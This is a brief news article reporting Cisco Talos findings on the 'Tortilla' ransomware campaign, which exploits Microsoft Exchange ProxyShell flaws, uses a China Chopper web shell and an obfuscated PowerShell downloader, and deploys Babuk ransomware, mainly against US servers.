Researchers at the Cisco Talos threat intelligence group discovered a new malicious campaign that attempts to exploit the still-unpatched ProxyShell hole in Microsoft Exchange email servers together with the Windows PetitPotam vulnerability, once again demonstrating the need for patching critical components.
Researchers at the Cisco Talos threat intelligence group found a new malicious campaign that tries to target unpatched vulnerable hosts and deploys Babuk ransomware.
“We assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,” share the researchers.
According to the researchers, the malware is mainly targeting US servers, with a smaller number of infections detected in the United Kingdom, Germany, Ukraine, Finland, Brazil, Honduras, and Thailand.
An unusual infection chain occurs.
The researchers claim that the malware’s developer, dubbed Tortilla, is using an unusual infection technique.
This starts with an intermediate unpacking module hosted on a pastebin.com look-a-like called Pastebin. pl. Before the final code is executed, the last payload is loaded into memory.
The downloader, according to the researchers, runs an obfuscated PowerShell command to connect and download another module from the actor’s infrastructure, which appears to be hosted in Russia.
The PowerShell command also executes an Antimalware Scan Interface (AMSI) bypass that allows it to avoid endpoint security detection before launching the Babuk malware.
“The leak of the Babuk builder and its source code in July have contributed to its wide availability, even for the less experienced ransomware operators, such as Tortilla,” The researchers call for end-users to build a layered defense security in order to stop such assaults in their early stages.
Subtly charming pop culture geek. Amateur analyst. Freelance tv buff. Coffee lover